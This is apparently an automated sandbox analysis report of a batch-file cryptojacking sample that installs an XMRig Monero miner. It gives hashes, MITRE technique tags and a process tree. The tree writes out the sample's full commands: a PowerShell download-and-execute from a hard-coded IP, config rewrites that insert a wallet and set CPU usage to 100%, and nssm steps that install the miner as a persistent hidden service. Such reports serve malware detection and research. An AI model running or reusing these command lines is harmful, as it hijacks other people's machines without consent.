xmrig | 9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5

Analysis

max time kernel
149s
max time network
137s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01/07/2024, 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

107651092531101.bat
Size

524B
MD5

92b307667679cc4bca93a2417be6137b
SHA1

5347620d753e52dbd274d04ae87356e09fe1c16d
SHA256

9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5
SHA512

d99751550c337010791b8522ce1966384b41b2f17d6bfaf89034ce9ef25e2648e99ce5b345c6858c79b7af65b357036b42ed88447bca5854644d12ce9cf8a791

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac03-128.dat	family_xmrig
behavioral1/files/0x000700000001ac03-128.dat	xmrig
behavioral1/memory/4768-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3060-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
1	2292	powershell.exe
4	2244	powershell.exe
6	4548	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4768	xmrig.exe
680	nssm.exe
1128	nssm.exe
5116	nssm.exe
696	nssm.exe
1108	nssm.exe
980	nssm.exe
1936	nssm.exe
3060	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4140	sc.exe
680	sc.exe
3080	sc.exe
5036	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
868	powershell.exe
4164	powershell.exe
3528	powershell.exe
692	powershell.exe
1680	powershell.exe
2000	powershell.exe
5104	powershell.exe
784	powershell.exe
2732	powershell.exe
4548	powershell.exe
2292	powershell.exe
2244	powershell.exe
360	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4824	timeout.exe
220	timeout.exe
3964	timeout.exe
4640	timeout.exe
1836	timeout.exe
2204	timeout.exe
4148	timeout.exe
1752	timeout.exe
2440	timeout.exe
408	timeout.exe
3848	timeout.exe
2732	timeout.exe
868	timeout.exe
700	timeout.exe
4552	timeout.exe
4400	timeout.exe
3900	timeout.exe
2856	timeout.exe
4012	timeout.exe
4308	timeout.exe
4520	timeout.exe
4300	timeout.exe
2904	timeout.exe
2028	timeout.exe
784	timeout.exe
5088	timeout.exe
4588	timeout.exe
2036	timeout.exe
1008	timeout.exe
1720	timeout.exe
2120	timeout.exe
3728	timeout.exe
524	timeout.exe
4460	timeout.exe
4884	timeout.exe
2732	timeout.exe
4292	timeout.exe
1156	timeout.exe
2044	timeout.exe
2360	timeout.exe
4404	timeout.exe
4248	timeout.exe
4940	timeout.exe
2116	timeout.exe
3084	timeout.exe
2372	timeout.exe
2984	timeout.exe
404	timeout.exe
3240	timeout.exe
5072	timeout.exe
428	timeout.exe
4512	timeout.exe
2720	timeout.exe
4888	timeout.exe
4680	timeout.exe
2324	timeout.exe
5084	timeout.exe
872	timeout.exe
3224	timeout.exe
4452	timeout.exe
4728	timeout.exe
3852	timeout.exe
4084	timeout.exe
2012	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1936	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe
360	powershell.exe
360	powershell.exe
360	powershell.exe
784	powershell.exe
784	powershell.exe
784	powershell.exe
3528	powershell.exe
3528	powershell.exe
3528	powershell.exe
692	powershell.exe
692	powershell.exe
692	powershell.exe
1680	powershell.exe
1680	powershell.exe
1680	powershell.exe
868	powershell.exe
868	powershell.exe
868	powershell.exe
2732	powershell.exe
2732	powershell.exe
2732	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	692	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeLockMemoryPrivilege	3060	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3060	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 2292	2896	cmd.exe	76
PID 2896 wrote to memory of 2292	2896	cmd.exe	76
PID 2292 wrote to memory of 1252	2292	powershell.exe	77
PID 2292 wrote to memory of 1252	2292	powershell.exe	77
PID 1252 wrote to memory of 1852	1252	cmd.exe	78
PID 1252 wrote to memory of 1852	1252	cmd.exe	78
PID 1852 wrote to memory of 4928	1852	net.exe	79
PID 1852 wrote to memory of 4928	1852	net.exe	79
PID 1252 wrote to memory of 2492	1252	cmd.exe	80
PID 1252 wrote to memory of 2492	1252	cmd.exe	80
PID 1252 wrote to memory of 3224	1252	cmd.exe	81
PID 1252 wrote to memory of 3224	1252	cmd.exe	81
PID 1252 wrote to memory of 4424	1252	cmd.exe	82
PID 1252 wrote to memory of 4424	1252	cmd.exe	82
PID 1252 wrote to memory of 1720	1252	cmd.exe	83
PID 1252 wrote to memory of 1720	1252	cmd.exe	83
PID 1252 wrote to memory of 4412	1252	cmd.exe	84
PID 1252 wrote to memory of 4412	1252	cmd.exe	84
PID 1252 wrote to memory of 4140	1252	cmd.exe	85
PID 1252 wrote to memory of 4140	1252	cmd.exe	85
PID 1252 wrote to memory of 680	1252	cmd.exe	86
PID 1252 wrote to memory of 680	1252	cmd.exe	86
PID 1252 wrote to memory of 1936	1252	cmd.exe	87
PID 1252 wrote to memory of 1936	1252	cmd.exe	87
PID 1252 wrote to memory of 2244	1252	cmd.exe	89
PID 1252 wrote to memory of 2244	1252	cmd.exe	89
PID 1252 wrote to memory of 4164	1252	cmd.exe	90
PID 1252 wrote to memory of 4164	1252	cmd.exe	90
PID 1252 wrote to memory of 5104	1252	cmd.exe	91
PID 1252 wrote to memory of 5104	1252	cmd.exe	91
PID 1252 wrote to memory of 4768	1252	cmd.exe	92
PID 1252 wrote to memory of 4768	1252	cmd.exe	92
PID 1252 wrote to memory of 208	1252	cmd.exe	93
PID 1252 wrote to memory of 208	1252	cmd.exe	93
PID 208 wrote to memory of 360	208	cmd.exe	94
PID 208 wrote to memory of 360	208	cmd.exe	94
PID 360 wrote to memory of 2952	360	powershell.exe	95
PID 360 wrote to memory of 2952	360	powershell.exe	95
PID 1252 wrote to memory of 784	1252	cmd.exe	96
PID 1252 wrote to memory of 784	1252	cmd.exe	96
PID 1252 wrote to memory of 3528	1252	cmd.exe	97
PID 1252 wrote to memory of 3528	1252	cmd.exe	97
PID 1252 wrote to memory of 692	1252	cmd.exe	98
PID 1252 wrote to memory of 692	1252	cmd.exe	98
PID 1252 wrote to memory of 1680	1252	cmd.exe	99
PID 1252 wrote to memory of 1680	1252	cmd.exe	99
PID 1252 wrote to memory of 868	1252	cmd.exe	100
PID 1252 wrote to memory of 868	1252	cmd.exe	100
PID 1252 wrote to memory of 2732	1252	cmd.exe	101
PID 1252 wrote to memory of 2732	1252	cmd.exe	101
PID 1252 wrote to memory of 4548	1252	cmd.exe	102
PID 1252 wrote to memory of 4548	1252	cmd.exe	102
PID 1252 wrote to memory of 2000	1252	cmd.exe	103
PID 1252 wrote to memory of 2000	1252	cmd.exe	103
PID 1252 wrote to memory of 3080	1252	cmd.exe	104
PID 1252 wrote to memory of 3080	1252	cmd.exe	104
PID 1252 wrote to memory of 5036	1252	cmd.exe	105
PID 1252 wrote to memory of 5036	1252	cmd.exe	105
PID 1252 wrote to memory of 680	1252	cmd.exe	106
PID 1252 wrote to memory of 680	1252	cmd.exe	106
PID 1252 wrote to memory of 1128	1252	cmd.exe	107
PID 1252 wrote to memory of 1128	1252	cmd.exe	107
PID 1252 wrote to memory of 5116	1252	cmd.exe	108
PID 1252 wrote to memory of 5116	1252	cmd.exe	108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\107651092531101.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp84B1.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1852
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4928
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2492
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3224
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4424
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:1720
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:4412
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4140
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:680
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5104
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:4768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:360
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Kzowysni\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2000
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3080
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5036
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:680
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:1128
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:5116
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:696
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:1108
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1308
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
